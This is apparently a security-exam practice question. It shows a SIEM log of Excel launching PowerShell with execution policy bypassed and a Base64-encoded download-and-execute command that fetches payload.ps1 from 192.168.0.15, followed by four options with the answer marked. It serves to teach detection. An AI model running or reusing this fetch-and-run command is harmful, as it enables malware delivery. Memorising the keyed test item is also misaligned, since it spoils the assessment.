A security analyst reviews a SIEM event log alert triggered by a host-based monitoring agent on a financial workstation:
text Timestamp: 2026-07-27T14:22:10Z Device: WKS-FIN-042 Event ID: 4688 (Process Creation) Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe CommandLine: powershell.exe -ExecutionPolicy Bypass -enc SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJ2h0dHA6AC8ALwAxADkAMgAuADEANgA4AC4AMAAuADEANQAvAHAAYQB5AGwAbwBhAGQALgBwAHMxACcAKQA= ParentProcessName: C:\Program Files\Microsoft Office\Office16\EXCEL.EXE Account Name: jdoe
Based on the correlated process creation details in this log snippet, which of the following attack scenarios is actively occurring?
- A productivity application macro spawned an encoded PowerShell command to retrieve a remote secondary payload.Answer
- BA web application vulnerability was exploited using a Cross-Site Scripting (XSS) script injection into the user browser session.
- CAn unauthorized user failed authentication checks during a high-frequency credential harvesting attempt.
- DA network-level detective security control failed to log the inbound perimeter network traffic burst.